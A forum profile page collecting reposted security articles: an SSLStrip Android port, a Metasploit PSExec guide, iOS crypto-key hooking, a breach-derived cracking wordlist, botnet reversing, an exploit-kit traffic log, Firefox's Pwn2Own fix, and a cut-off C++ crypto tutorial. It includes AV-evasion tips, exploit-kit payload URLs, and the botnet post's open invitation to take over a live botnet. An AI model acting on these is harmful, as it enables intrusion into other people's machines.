Everything posted by Nytro

  1. SSLStrip-for-Android SSLStrip for Android This project is a port of SSLStrip (https://github.com/moxie0/sslstrip), plus the NanoHTTPD and Arpspoof for Android libraries. How to build: 1) Go to the libs folder, run ndk-build, and copy arpspoof to res/raw/arpspoof. 2) Compile this Eclipse project as usual! PS: For research purposes only. Please do not abuse this software. Sursa: https://github.com/crazyricky/SSLStrip-for-Android
  2. [h=1]PSExec Demystified [/h]Posted by thelightcosine in Metasploit on Mar 9, 2013 10:28:33 AM Multiple modules inside the Metasploit Framework bear the title PSExec, which may be confusing to some users. When someone simply refers to “the PSExec module”, they typically mean exploit/windows/smb/psexec, the original PSExec module. Other modules are more recent additions, and make use of the PSExec technique in other ways. Here’s a quick overview of what these modules are for: [TABLE=width: 437] [TR] [TD]Metasploit Module [/TD] [TD=width: 118]Purpose [/TD] [TD=width: 149]Comment [/TD] [/TR] [TR] [TD=width: 171]exploit/windows/smb/psexec [/TD] [TD=width: 118]Evading anti-virus detection [/TD] [TD=width: 149]Service EXE is now getting caught by most AV vendors. Use custom templates or MOF upload method to circumvent AV detection. [/TD] [/TR] [TR] [TD=width: 171]exploit/windows/local/current_user_psexec [/TD] [TD=width: 118]Local exploit for local administrator machine with goal to obtain session on domain controller [/TD] [TD=width: 149]Great starting point to take over an entire network. Attack is less likely to get noticed because it uses legitimate access methods. [/TD] [/TR] [TR] [TD=width: 171]auxiliary/admin/smb/psexec_command [/TD] [TD=width: 118]Run arbitrary commands on the target without uploading payloads. [/TD] [TD=width: 149]Unlikely to be detected by AV but limited because you can only send one command, not obtain a session. [/TD] [/TR] [TR] [TD=width: 171]auxiliary/scanner/smb/psexec_loggedin_users [/TD] [TD=width: 118]Get list of currently logged in users [/TD] [TD=width: 149]Run this module against all targets to get tons of information on your targets. [/TD] [/TR] [/TABLE] We’ll now look at each one in detail below. First, let’s talk about what PSExec is, and where the idea comes from. [h=2]The PSExec Utility[/h] The name PSExec comes from a program by the same name. 
Mark Russinovich wrote this utility as part of his Sysinternals suite in the late 90s to help Windows administrators perform important tasks, for example executing commands or running executables on remote systems. The PSExec utility requires a few things on the remote system: the Server Message Block (SMB) service must be available and reachable (e.g. not blocked by a firewall); File and Print Sharing must be enabled; and Simple File Sharing must be disabled. The Admin$ share must be available and accessible. It is a hidden SMB share that maps to the Windows directory and is intended for software deployments. The credentials supplied to the PSExec utility must have permission to access the Admin$ share. PSExec has a Windows service image inside its executable. It takes this service and deploys it to the Admin$ share on the remote machine. It then uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API and starts the PSExec service on the remote machine. The PSExec service then creates a named pipe that can be used to send commands to the system. [h=2]The PSExec Exploit (exploit/windows/smb/psexec)[/h] The PSExec exploit module in Metasploit runs on the same basic principle as the PSExec utility. It can behave in several ways, many of them unknown to most users. [h=3]The Service EXE[/h] In this method, the exploit generates and embeds a payload into an executable, which is a Windows service image similar to the one the PSExec utility deploys. The exploit then uploads the service executable to the Admin$ share using the supplied credentials, connects to the DCE/RPC interface, and calls into the Service Control Manager, telling SCM to start the service we deployed to Admin$ earlier. When the service is started, it starts a new rundll32.exe process, allocates executable memory inside that process and copies the shellcode into it.
It then calls the starting address of that memory location as if it were a function pointer, executing the stored shellcode. The service EXE is generated using an executable template with a placeholder where the shellcode is inserted. The default executable templates in the Metasploit Framework are flagged by major AV solutions because most anti-virus vendors have signatures for detecting these templates. No matter what payload you stick in this executable template, it will get flagged by AV. [h=4]AV Evasion[/h]The PSExec exploit has several advanced options. The first is the option to supply an alternative executable template. There are two separate options: one is set EXE::Path, which tells Metasploit to look in a different directory for the executable templates. The other is set EXE::Template, which is the name of the executable template file to use. If you create an executable template and store it in a different directory, you will need to set both of these options. Writing a custom executable template is a good way to avoid AV detection. If you write your own EXE template for the PSExec exploit, it must be a Windows service image. In addition to writing a custom executable template, you can write an entire executable on your own. This means that a Metasploit payload will not actually get inserted; you will code the entire behavior into the EXE itself. The psexec exploit module will then upload the EXE and try to start it via SCM. Tip: If you would like to save time evading anti-virus, you can use the dynamic executable option in Metasploit Pro, which generates random executable files each time that are much less likely to be detected by anti-virus. (Watch my webcast Evading Anti-virus Detection with Metasploit for more info.) [h=3]The Management Object File (MOF) upload method[/h] MOF (Managed Object Format) files are a part of Windows Management Instrumentation (WMI). They contain WMI information and instructions.
MOF files must be compiled to work properly; however, there is a way around that on Windows XP. In Windows XP, if you drop an uncompiled MOF file in the system32\wbem\mof\ directory, Windows XP will compile the MOF for you and run it. The PSExec exploit has a method for using this to our advantage. If you set MOF_UPLOAD_METHOD to true, it will do a few things differently. Our payload EXE will be generated as a normal EXE instead of a service EXE. The exploit will then upload it via Admin$ as expected before generating a MOF file that will execute the EXE we uploaded. It will use Admin$ to deploy the MOF file to the MOF directory. Windows XP will then compile and run the MOF, causing our payload EXE to be executed. The MOF method can be combined with the custom EXE or custom template methods described above to try and evade AV as well. The MOF method currently only works on Windows XP, as later versions require the MOF to already be compiled in order to run. [h=2]The PSExec Current User Local Exploit (exploit/windows/local/current_user_psexec)[/h] The Current User PSExec module is a local exploit. This means it is an exploit run through an already established session. Let's set up a scenario to explain how this works. In our scenario you do the following: set up a browser exploit at some address; trick a local system administrator into visiting the site; get a reverse Meterpreter shell inside the administrator's browser process; and run netstat to see if the administrator is connected to one of the domain controllers. So now Meterpreter is running on a system administrator's box under her user context. While there may not be anything you're interested in on her workstation, she has permission to access a domain controller (DC), which you would like to shell. You don't have her credentials, and you cannot talk directly to the DC from your box. This is where the current_user_psexec module comes in. This local exploit works the same way as the psexec exploit.
However, it runs from the victim machine, and you do not supply any credentials. This exploit takes the authentication token from the user context and passes that along. This means you can get a shell on any box the user can connect to from that machine and has permissions on, without actually knowing what their credentials are. This is an invaluable technique to have in your toolbox. From that first machine you can compromise numerous other machines, without having set up any proxy or VPN pivots, and you will have done it using legitimate means of access. [h=2]The PSExec Command Execution Module (auxiliary/admin/smb/psexec_command)[/h] Submitted by community contributor Royce @R3dy__ Davis, this module expands upon the usefulness of the PSExec behavior. It utilizes the same basic technique but does not upload any binaries. Instead it issues a single Windows command to the system, which the remote system then runs. This allows arbitrary commands to be executed on the remote system without sending any payloads that could be detected by AV. While it does not get you a shell, it will allow you to perform specific one-off actions on the system that you may need. [h=2]The PSExec Logged In Users Module (auxiliary/scanner/smb/psexec_loggedin_users)[/h] Also brought to you by Royce @R3dy__ Davis, this module is a specialized version of the command execution one. It uses the same technique to query the registry on the remote machine and get a list of all currently logged-in users. It is a scanner module, which means it can run against numerous hosts simultaneously, quickly gathering the information from all the targeted hosts. [h=2]Summary[/h] What we've seen here is that the PSExec technique is actually a relatively simple mechanism with immense benefit. We should all remember to thank Mark Russinovich for this wonderful gift he has given us.
As time goes by, people will find many more uses for this same technique, and there is room for improvement on how these modules work and interact. The PSExec exploits are two of the most useful, and most reliable, techniques for getting shells in the entire Metasploit Framework. Sursa: https://community.rapid7.com/community/metasploit/blog/2013/03/09/psexec-demystified
  3. Retrieving Crypto Keys via iOS Runtime Hooking Tuesday, March 5, 2013 at 8:45AM I am going to walk you through a testing technique that can be used at runtime to uncover security flaws in an iOS application when source code is not available, and without having to dive too deeply into assembly. I am going to use a recent example of an iOS application I reviewed, which performed its own encryption when storing data onto the device. These types of applications are a lot of fun to look at due to the variety of insecure ways people implement their own crypto. In this example the application required authentication, then pulled down some data and stored it encrypted on the device for caching. The data was presented to the user, who could “act” upon it. Sounds pretty generic, but hopefully the scenario is familiar to those who assess mobile apps. Upon analyzing the application traffic, it was obvious that no crypto keys were being returned from the server. After sweeping the iOS Keychain and the entire application container, I could make the educated assumption that the key was either a hardcoded value or derived using device-specific information. Using the Hopper Disassembler (available on the Mac App Store), I was able to see that the application was leveraging the Common Crypto library for its encryption. I checked the cross-references for calls to the CCCryptorCreate function in order to find the code areas which perform encryption. The following screenshot shows getSymmetricKeyBytes being called right before the CCCryptorCreate function. I felt pretty confident that the purpose of the getSymmetricKeyBytes method was to return the symmetric key used for encryption. I decided to create a Mobile Substrate tweak in order to hook into getSymmetricKeyBytes and read the return value. I used the class-dump-z tool to get a listing of all the exposed Objective-C interfaces.
From here it is easy to get more detailed information about the method, such as the class name, return type and any required parameters. The following is a short snippet retrieved from the class-dump-z results:

@interface SecKeyWrapper : XXUnknownSuperclass {
  NSData* publicTag;
  NSData* privateTag;
  NSData* symmetricTag;
  unsigned typeOfSymmetricOpts;
  SecKey* publicKeyRef;
  SecKey* privateKeyRef;
  NSData* symmetricKeyRef;
}
[..snip..]
-(id)getSymmetricKeyBytes;
-(id)doCipher:(id)cipher key:(id)key context:(unsigned)context padding:(unsigned*)padding;
[..snip..]

We can quickly create a tweak by using the Theos framework. The tweak in this case looked as follows:

%hook SecKeyWrapper
- (id)getSymmetricKeyBytes {
  NSLog(@"HOOKED getSymmetricKey");
  id theKey = %orig;
  NSLog(@"KEY: %@", theKey);
  return theKey;
}
%end

%ctor {
  NSLog(@"SecKeyWrapper is created.");
  %init;
}

It doesn't do much more than read the return value of the original method call and write it out to the console. It was possible to confirm that a static key was being used by running the tweak on another iPad and observing that the same symmetric key was returned. The next step was to decrypt the files. We could hook into the doCipher:key:context:padding method and just print out the first parameter to get the plaintext data. That would work, but it wouldn't be reproducible, since the tweak code would only execute when the doCipher:key:context:padding method is actually run by the application. A quick Google search on the SecKeyWrapper class turned up the following sample code from Apple. Sursa: GDS Blog - Retrieving Crypto Keys via iOS Runtime Hooking
  4. [h=1]A BIG password cracking wordlist[/h] Defuse Security have released the wordlist used by their Crackstation project. It really is something. The numbers? 4.2 GiB compressed. 15 GiB uncompressed. 1,493,677,782 words. It's a mix of every wordlist, dictionary, and password database leak; every word in the Wikipedia databases (pages-articles, retrieved 2010, all languages); as well as lots of books from Project Gutenberg. It also includes the passwords from some low-profile database breaches that were being sold in the underground years ago. I was in the process of doing this myself, mixing all of the password database leaks along with pr0n password dumps, so yeah, these guys saved me a lot of work. I don't really know how this wordlist compares to UNIQPASS v11, but that's something for someone else to find out. Now.. on to hashcat for some tests. P.S: A guide on using hashcat will follow sometime in the near future ;p Torrent Download: Download A BIG password cracking wordlist Torrent | 1337x.org Sursa: A BIG password cracking wordlist | 57un
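As a quick back-of-the-envelope sanity check of the quoted numbers (my own arithmetic, not from the release notes, and assuming one word per line with the newline counted):

```python
# Average bytes per word in a 15 GiB, ~1.49-billion-word list.
total_bytes = 15 * 1024 ** 3           # 15 GiB uncompressed
word_count = 1_493_677_782             # word count quoted above
avg_bytes_per_word = total_bytes / word_count
print(round(avg_bytes_per_word, 1))    # roughly 10.8 bytes per word
```

That average (about 10 characters plus a newline per entry) is plausible for a list mixing passwords with dictionary and Wikipedia words.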
  5. [h=1]Reversing a Botnet[/h] Howdy fellow crackers and hackers alike! Have I got a treat for you: a live botnet. The other day at work, I encountered a number of machines all attacking other hosts. Normally it's just one machine, but this time there were several. We isolated the exe responsible because it was eating up 100% CPU (not exactly subtle). I was curious about what made it tick, so I disassembled it, and this is what I found. Normally where I work, we're hit by botnets and never get to catch them in the act, as tracking down the mothership is difficult. First things first, I want to know more about the executable, like whether it's packed, or what have you. As the picture shows, the executable is NOT packed, rather just your standard run-of-the-mill PE (Portable Executable) file. The two extra sections highlighted tell us the type of compiler used – GCC for Windows, aka MinGW, meaning either Code::Blocks or Dev-C++ was used. I say this because the .bss and .idata sections are specific to GCC and remind me of ELF (Executable and Linkable Format) used by Linux. Since I don't want to join said botnet, I'm sticking to static analysis. Opening the thing up in IDA, we find exactly what kind of malware we're dealing with – amateurish. The strings are not encoded, nor are they hidden. The first thing I noticed was the IP address. For those curious, a quick search on ARIN reveals the IP address as belonging to some colocation service in Atlanta: http://whois.arin.net/rest/net/NET-199-229-248-0-1/pft The next thing we see is the channel name #test (more on that in a sec), then the passwords. The 'Operation Dildos' name suggests that our malware writers are either 14 or immature. I still chuckled, though. The next thing I determined was the type of bot we were dealing with. Scrolling further through revealed IRC instructions. You've read RFC 1459, right? IRCHelp.org — Untitled Page JOIN, PING, PONG, NICK, PRIVMSG – these are all IRC commands.
Further inspection of the bot revealed the commands that can be issued to the bot by its master. The commands are: 'help' – derp. 'version' – derrrr. 'speedtest' – perform a speed test by making a web request to 68.11.12.242, which traces to Louisiana. I have a feeling our malware writer lives in that area, because the botnet server resides in Georgia. Just a guess. 'exec' – Execute a command. 'dle' – Download and execute a file. 'udp' – Do a UDP flood. 'openurl' – Open a hidden window of a URL. 'syn' – Do a SYN flood. 'stop' – Stops execution. If you're curious how the bot performs the lookup on the command, here it is. What you can't see is the stub at the top, which belongs to the subroutine responsible for the IRC connection to the server. The next thing I found scrolling through was the error handler data section – messages sent to alert the master that a given command completed. The last thing in this reversing session I'd like to point out is just before the command listing – the password check. The assembly instruction 'repne scasb' is a string operation: it scans a string for NULL, decrementing ecx (the extended counter register) for each char. I see it primarily with string comparison operations. Enough about the bot itself; let's learn more about the botnet. A quick ping shows us it's still online. Connecting to it seems to work, so it's still operational. The botnet itself seems to be growing, because when I looked last night, there were only 400 hosts. Checking now, I see 'There are 3 users and 1131 invisible on 2 servers'. When I connected, I was called out by the server admin within minutes. Since I don't want to throw rocks at a hornet's nest (get my server DDoS'd off the net), I decided not to pursue further. My readers, on the other hand: go nuts. You have the password to issue commands, you have the IRC server address, and you have the channel where the bots reside (#test).
Perhaps I may try again tonight at like 1 am when the admins are probably asleep. Until then, keep on cracking. For those of you who are curious, you can download the bot here, complete with IDA 6 compatible db file: The Bot. Sursa: Reversing a Botnet
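For readers unfamiliar with the instruction, here is a rough Python model of the 'repne scasb' scan described above (this is just an illustration of the semantics, not code from the bot):

```python
def scasb_strlen(buf: bytes) -> int:
    """Model of `repne scasb` with AL = 0: scan bytes until a NUL byte
    matches, counting how many bytes were examined along the way. The
    real instruction counts DOWN in ECX; counting up is equivalent here."""
    count = 0
    for byte in buf:
        if byte == 0:   # comparison hit: the scan stops at the NUL
            break
        count += 1
    return count

print(scasb_strlen(b"password\x00junk"))  # -> 8
```

This scan-for-terminator pattern is why the idiom shows up around strlen-style code and, as noted above, password/string comparison routines.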
  6. [h=1]CVE-2013-1493 (jre17u15 - jre16u41) in Cool EK[/h]That was fast (4 days after the patch). After CVE-2013-0634 (Flash), it's now CVE-2013-1493 (the last known vulnerability up to jre17u15 - jre16u41) that reaches Cool Exploit Kit (from a Reveton distributor - btw this ransomware seems to be clothed again in what I called the Winter II design). Credits first: Will Metcalf from Emerging Threats for the "path" part of the landing. Michael Schierl for confirming (and giving more clues) that it looks like CVE-2013-1493. Chris Wakelin for additional tips. I will update here the integration in other exploit kits (it would be surprising if it does not happen... and I will modify the title). Cool EK: jre17u15: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]CVE-2013-1493 successful path in Cool EK (jre17u15) 2013-03-08[/TD] [/TR] [/TABLE] jre16u41: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]CVE-2013-1493 successful path in Cool EK (jre16u41) 2013-03-08[/TD] [/TR] [/TABLE] GET http://retrempercircum[...].glamorizesports.com/world/bright_rural_mutter.html 200 OK (text/html) GET http://retrempercircum[...].glamorizesports.com/world/rug-magistrate.jar 200 OK (application/java-archive) a3410c876ed4bb477c153b19eb396f42 GET http://retrempercircum[...].glamorizesports.com/world/improved_violently_section.swf 404 Not Found (text/html) GET http://[...]/world/getnn.jpg 200 OK (application/x-msdownload) e343845066df8c271b5ac095f2d44183 Out of scope Reveton Note: if you get infected with Java 1.7u > 10, don't try to say you were not warned! [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Security in jre17u>10 Want to get infected ?
follow the bubble[/TD] [/TR] [/TABLE] For Java 1.6... things are different: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD=class: tr-caption, align: center]In jre16 (no comment)[/TD] [/TR] [/TABLE] Files: a3410c876ed4bb477c153b19eb396f42 (nothing more for now) Reading: YAJ0: Yet Another Java Zero-Day - 2013-02-28 - Darien Kindlund and Yichong Lin - FireEye Blog CVE-2013-1493 - MITRE Latest Java Zero-Day Shares Connections with Bit9 Security Incident - 2013-03-01 - Symantec Posted 21 hours ago by Kafeine Sursa: Malware don't need Coffee: CVE-2013-1493 (jre17u15 - jre16u41) in Cool EK
  7. [h=1]Protecting Mozilla Firefox users on the web[/h] I have followed Pwn2Own ever since its inception in 2007. For those of you who do not know what Pwn2Own is, it is a competition in which hackers try to take advantage of software weaknesses in browsers (Internet Explorer, Firefox, Chrome, Safari, etc.): they put up specially crafted webpages and visit them to try to launch another application, usually calc.exe, and gain a monetary reward in return. It usually happens on the sidelines of CanSecWest, a yearly security conference held in Vancouver. During my university days in Singapore, on the other side of the world, I always followed this competition with anticipation. I told myself: one day, just one day, I will be at the frontline helping to decipher the problem and get the fix out to Firefox users around the world as soon as possible. Over the years, a security researcher by the name of Nils took down Firefox in 2009 (bug 484320) and in 2010 (bug 555109), whereas in 2011, nobody took down Firefox. Last year, in 2012, I was on-site in Vancouver and witnessed Willem Pinckaers and Vincenzo Iozzo take down Firefox; however, the bug (720079) had already been identified and fixed through internal processes. This year, Pwn2Own became the venue for many exploits against major browsers, including Firefox (bug 848644), as well as plugins often used in browsers, such as Flash and Java. The team that took down Firefox this year was VUPEN Security, who also punched holes through Internet Explorer 10, Java and Flash. Some of my colleagues were present at the conference and were relaying information to us live, while I stayed back at the office preparing my machines to diagnose the issue. === The following timeline (all times PST) describes my role behind the scenes with respect to the Firefox exploit by VUPEN, on March 6, 2013: ~3pm: Rumblings heard on IRC channels that Firefox has been moved from its scheduled slot to 5.30pm.
5.30pm: VUPEN gets ready. ~5.54pm: VUPEN takes down Firefox. The on-site team gets to work getting details of the exploit. ~7pm: Bug 848644 gets filed. Looking at the innards of the testcase, together with confirmation from team members over IRC that there is no malicious code present (the Proof of Concept (PoC) code just crashes), I manage to reproduce the crash on a fully-patched Windows 7 system. More analysis from early responders flows in: information such as the attack vector (Editor) and the ASan stack trace showing the implicated functions (possibly nsHTMLEditRules::GetPromotedPoint). I did a quick stab at the regression range here. Using the bisection technique described here, I found that early January 2012 builds did not crash, whereas early January 2013 builds did crash. The testcase seemed tricky initially; until it was eventually found (quite a while later) that one could reliably trigger this with one tab that somehow caused the “pop-up blocked” info bar to show, I had to try the testcase repeatedly, sometimes reloading, sometimes closing then opening the browser again to trigger the crash. Using mozregression here might have been a good idea – however, a single incorrect decision about whether a particular build was crashing would lead to bisecting down to an incorrect regression window and wasting precious time. Time was of the essence here – the sooner one gets an accurate regression window, the faster a developer can potentially pinpoint the cause of the crash. I found myself repeatedly downloading and checking builds to see if they did crash or not. Sometimes the crash happened immediately on load (with the initial PoC). Other times it happened only after a few minutes, or only after a restart. I eventually settled on the following regression window: the crash happens on the October 6, 2012 nightly, but not on the previous day's (October 5), and I posted a comment so this could get confirmation from other people.
I then immediately looked through the hgweb regression window to see if anything stood out – bug 796839 seemed like a likely cause, but everything else was still a possibility. In that regression window, more clues emerged. The ASan stack trace pointed to nsHTMLEditRules::GetPromotedPoint being part of the bigger picture here, and some detective work showed that in this changeset from bug 796839, the file editor/libeditor/html/nsHTMLEditRules.cpp was changed, and this was the file that nsHTMLEditRules::GetPromotedPoint was located in. Coincidence? Probably. However, this made everything more likely. At this point in time, it was 8pm, approximately one hour from the point at which the testcase was obtained. I began to consider (and possibly discount) other possibilities, including bug 795610. Thanks to great work by Nicolas Pierron and his git wizardry, we found that nsHTMLInputElement::SetValueInternal (also implicated in the ASan stack trace) existed in nsHTMLInputElement.cpp, which was modified in that bug. However, this possibility was quickly discounted. At this point, I was able to get independent verification that the regression window (Oct 5 – Oct 6) was indeed correct. Further checking showed that our Extended Support Release (ESR) builds on version 17 were also affected. This made bug 796839 extremely likely to be the root cause, because it landed on mozilla-central during the version 18 nightly window but was backported to mozilla-aurora at that time, which was the version 17 branch. Bug 796839 would encompass the patch landing that inadvertently opened up a vulnerability in Firefox. Independent confirmation of this regressor came at 9pm. Within 2 hours, we had gone from having a PoC testcase with no idea what was affected to knowing which patch caused the issue. I thus nominated the fix to be landed on all affected branches. By about 10pm, the fix was put up for review.
After that, lots of great work by various people and teams went into quick approvals, landing of the fix, and QA verification. Overnight, builds were created, and by late morning the next day the advisory was prepared, with QA about to sign off on the new builds. At 4pm, a new version of Firefox (19.0.2) was shipped with the fix. === Credit must be given to the other Mozilla folks in this effort, who have, outside of normal working hours, worked till late night to make this possible. I am proud to be part of this fabulous team effort. It certainly has been my honour to have helped keep Mozilla users safe on the web. Sursa: Protecting Mozilla Firefox users on the web | It's a Wonderful Life
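The build-bisection workflow described above is essentially a binary search over nightly build dates. A minimal sketch of the idea (my own illustration, with a toy crash predicate standing in for actually downloading and testing each nightly, and using the Oct 5/Oct 6 window from the post):

```python
from datetime import date

def bisect_regression(good, bad, crashes):
    """Binary-search nightly dates for the regression window.
    `crashes(d)` must be False for `good` and True for `bad`;
    one wrong answer from the predicate ruins the whole search,
    which is the caveat raised above about mozregression."""
    while (bad - good).days > 1:
        mid = good + (bad - good) // 2
        if crashes(mid):
            bad = mid    # mid crashes: first bad build is on or before mid
        else:
            good = mid   # mid is clean: the regression landed after mid
    return good, bad     # (last good nightly, first bad nightly)

# Toy predicate: pretend builds from 2012-10-06 onwards crash.
window = bisect_regression(date(2012, 1, 1), date(2013, 1, 1),
                           lambda d: d >= date(2012, 10, 6))
print(window)  # -> (datetime.date(2012, 10, 5), datetime.date(2012, 10, 6))
```

With roughly a year between the known-good and known-bad builds, this needs only about nine build checks instead of hundreds, which is why an accurate crash predicate matters so much.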
  8. [h=1]Cryptographic Primitives in C++[/h] This page walks through the implementation of an easy-to-use C++ wrapper over the OpenSSL crypto library. The idea is to go through the OpenSSL documentation once, make the right choices from a cryptographic point of view, and then hide all the complexity behind a reusable header. The following primitives are typically used in the applications I write: Random Number Generation; Password Based Symmetric Key Generation (PBKDF2/HMAC-SHA-256); Message Digests and Authentication Codes (SHA-256 & HMAC-SHA-256); Authenticated Encryption with Associated Data (AES-128-GCM). The wrapper is a single header file that can be included wherever these primitives are needed. It includes OpenSSL and Boost headers and will require linking with the OpenSSL object libraries. Here is a sample and here are the tests. [h=4]Data Buffers[/h] Most of the wrapper functions work on blocks of data and we need a way to pass these in and out of the wrapper routines. Any C++ container that guarantees contiguous storage (i.e. std::vector, std::string, std::array, boost::array or a raw char array) can be passed as the argument to any wrapper function that takes a data buffer as a parameter. Having said that, it is best to avoid using dynamic STL containers for storing sensitive data because it is difficult to scrub them once we're done using the secrets. The implementations of these containers are allowed to reallocate and copy their contents in memory and may end up with inaccessible copies of sensitive data that we can't overwrite. Simpler containers like boost::array or raw char arrays are better for this purpose. You can also use the following typedef:

namespace ajd { namespace crypto {
  /// A convenience typedef for a 128 bit block.
  typedef boost::array<unsigned char, 16> block;
  /// Remove sensitive data from the buffer
  template<typename C> void cleanse(C &c);
}}

The wrapper also provides a cleanse method that can be used to overwrite secret data in the buffers. This method does not deallocate any memory; it only overwrites the contents of the passed buffer by invoking OPENSSL_cleanse on it. [h=4]Secure Random Number Generation[/h] OpenSSL provides a simple interface around the underlying operating system PRNG. This is exposed by the wrapper using the following two functions:

/// Checks if the PRNG is sufficiently seeded
bool prng_ok();
/// Fills the passed container with random bytes.
template<typename C> void fill_random(C &c);

prng_ok checks if the PRNG has been seeded sufficiently, and fill_random fills any mutable container with random bytes. In the exceptional situation that prng_ok returns false, you must use the OpenSSL seed routines RAND_seed and RAND_add directly to add entropy to the underlying PRNG. Here's how you can use them:

void random_generation()
{
  assert(crypto::prng_ok());           // check PRNG state
  crypto::block buffer;                // use the convenience typedef
  crypto::fill_random(buffer);         // fill it with random bytes
  unsigned char arr[1024];             // use a static POD array
  crypto::fill_random(arr);            // fill it with random bytes
  std::vector<unsigned char> vec(16);  // use a std::vector
  crypto::fill_random(vec);            // fill it with random bytes
}

[h=4]Password Based Symmetric Key Generation[/h] Symmetric ciphers require secure keys, and one way to generate them is using the fill_random routine seen above. More commonly, however, we'd want to derive the key bits from a user-provided password. The standard way to do this is the PBKDF2 algorithm, which derives the key bits by iterating over a pseudo-random function with the password and a salt as inputs. The wrapper sets HMAC-SHA-256 as the chosen pseudo-random function and uses a default iteration count of 10000.
/// Derive a key using PBKDF2-HMAC-SHA-256
template <typename C1, typename C2, typename C3>
void derive_key(C3 &key, const C1 &passwd, const C2 &salt, int c = 10000)
The salt can be any public value that will be persisted between application runs. Repeated invocations of this key derivation routine with the same password and salt value produce the same key bits. This saves us from the hassle of securely storing the secret key, assuming that the application can interact with a human user and prompt for the password. Here's a sample invocation of the key derivation routine:
void key_generation()
{
  crypto::block key;                          // 128 bit key
  crypto::block salt;                         // 128 bit salt
  crypto::fill_random(salt);                  // random salt
  crypto::derive_key(key, "password", salt);  // password derived key
  crypto::cleanse(key);                       // clear sensitive data
}
[h=4]Message Digests and Message Authentication Codes[/h]
Cryptographic hashes are compression functions that digest an arbitrary sized message into a small fingerprint that uniquely represents it. Although they are the building blocks for implementing integrity checks, a hash, by itself, cannot guarantee integrity. An adversary capable of modifying the message is also capable of recomputing the hash of the modified message to send along. For an additional guarantee on the origin we need a stronger primitive, which is the message authentication code (MAC). A MAC is a keyed-hash, i.e. a hash that can only be generated by those who possess an assumed shared key. The assumption of secrecy of the key limits the possible origins and thus provides us the guarantee that an adversary couldn't have generated it. MD5 should not be used, and SHA-1 hashes are considered weak and unsuitable for all new applications. The wrapper uses SHA-256 for generating plain digests and HMAC with SHA-256 for MACs.
/// Generates a keyed or a plain cryptographic hash.
class hash: boost::noncopyable
{
public:
  /// A convenience typedef for a 256-bit SHA-256 value.
  typedef boost::array<unsigned char, 32> value;
  /// The plain hash constructor (for message digests).
  hash();
  /// The keyed hash constructor (for MACs)
  template<typename C> hash(const C &key);
  /// Include the contents of the passed container for hashing.
  template <typename C> hash &update(const C &data);
  /// Get the resultant hash value.
  template<typename C> void finalize(C &sha);
  /// ... details ...
};
The default constructor of the class initializes the instance for message digests. The other constructor takes a key as input and initializes the instance for message authentication codes. Once initialized, the data to be hashed can be added by invoking the update method (multiple times, if required). The resulting hash or MAC is a SHA-256 hash (a 256 bit value) that can be extracted using the finalize method. The shorthand typedef hash::value can be used to hold the result. The finalize method also reinitializes the underlying hash context and resets the instance for a fresh hash computation. Here's how you can use the class:
void message_digest()
{
  crypto::hash md;               // the hash object
  crypto::hash::value sha;       // the hash value
  md.update("hello world!");     // add data
  md.update("see you world!");   // add more data
  md.finalize(sha);              // get digest value
}
void message_authentication_code()
{
  crypto::block key;             // the hash key
  crypto::fill_random(key);      // random key will do (for now)
  crypto::hash h(key);           // the keyed-hash object
  crypto::hash::value mac;       // the mac value
  h.update("hello world!");      // add data
  h.update("see you world!");    // more data
  h.finalize(mac);               // get the MAC code
  crypto::cleanse(key);          // clean sensitive data
}
[h=4]Authenticated Encryption with Associated Data[/h]
Encryption guarantees confidentiality and authenticated encryption extends that guarantee to guard against tampering of encrypted data. Operation modes like CBC or CTR cannot detect modifications to the ciphertext and decrypt tweaked data as they would decrypt any other ciphertext.
An adversary can use this fact to make calibrated modifications to the ciphertext and end up with the desired plaintext in the decrypted data. The recommended way to guard against such attacks is to use an authenticated encryption mode like the Galois Counter Mode (GCM). Authenticated encryption schemes differ from the simpler schemes in that they produce an extra output along with the cipher text. This extra output is an authentication tag that is required as an input at the time of decryption, where it is used to detect modifications in the ciphertext.
Another feature of authenticated encryption is their support for associated data. Network protocol messages include data (e.g. header fields in packets) that doesn't need to be encrypted but must be guarded against modifications in transit. Authenticated encryption schemes allow the addition of such data into the tag computation. So while the adversary can view this data in transit, it cannot be modified without the decryption routine noticing it. The following class provides authenticated encryption with associated data:
/// Provides authenticated encryption (AES-128-GCM)
class cipher : boost::noncopyable
{
public:
  /// Encryption mode constructor.
  template<typename K, typename I> cipher(const K &key, const I &iv);
  /// Decryption mode constructor.
  template<typename K, typename I, typename S> cipher(const K &key, const I &iv, S &seal);
  /// The cipher transformation.
  template<typename I, typename O> cipher &transform(const I &input, O &output);
  /// Adds associated authenticated data.
  template<typename A> cipher &associate_data(const A &aad);
  /// The encryption finalization routine.
  template<typename S> void seal(S &seal);
  /// The decryption finalization routine (throws if the ciphertext is corrupt)
  void verify();
  /// ... details ...
};
The crypto::cipher class has two constructors. The 2 argument variant takes a key and an initialization vector (128 bits each) and initializes the instance for encryption.
Plaintext can be transformed into ciphertext using the transform method. The GCM mode does not use any padding, so the output ciphertext buffer must be as big as the input plaintext buffer. If there's any associated data that needs to be sent along with the ciphertext, it can be added using the associate_data method. Note that the OpenSSL implementation of GCM requires that associated data is added before the plaintext (i.e. all calls to associate_data must precede all calls to transform). Once all the data has been added, the seal method must be invoked to obtain the authentication tag (128 bits), and it must be sent along with the ciphertext.
The 3 argument constructor takes a key, an IV and the encryption seal as inputs and initializes the instance for decryption. Ciphertext can then be transformed to plaintext using the transform method (after adding any associated data using the associate_data method). Before using the plaintext, the verify method must be invoked to detect any tampering in the ciphertext or associated data. If all is well the method silently returns; however, if the seal does not match the expected tag value, an exception is raised and the decrypted plaintext must be rejected. The following sample shows the usage:
void authenticated_encrypt_decrypt()
{
  crypto::block iv;                           // initialization vector
  crypto::block key;                          // encryption key
  crypto::block seal;                         // container for the seal
  crypto::fill_random(iv);                    // random initialization vector
  crypto::fill_random(key);                   // random key will do (for now)
  unsigned char date[] = {14, 1, 13};         // associated data
  std::string text("can you keep a secret?"); // message (plain-text)
  std::vector<unsigned char> ciphertext(text.size());
  {
    crypto::cipher cipher(key, iv);           // initialize cipher (encrypt mode)
    cipher.associate_data(date);              // add associated data first
    cipher.transform(text, ciphertext);       // do transform (i.e. encrypt)
